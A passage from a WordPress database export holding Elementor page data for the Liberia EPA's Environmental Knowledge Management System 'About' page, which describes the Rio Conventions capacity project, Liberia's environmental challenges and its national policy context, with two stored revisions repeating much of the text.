concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12313,2002,'_elementor_edit_mode','builder'),(12314,2002,'_elementor_template_type','wp-page'),(12315,2002,'_elementor_version','2.7.5'),(12316,2002,'_wp_page_template','default'),(12317,2002,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities 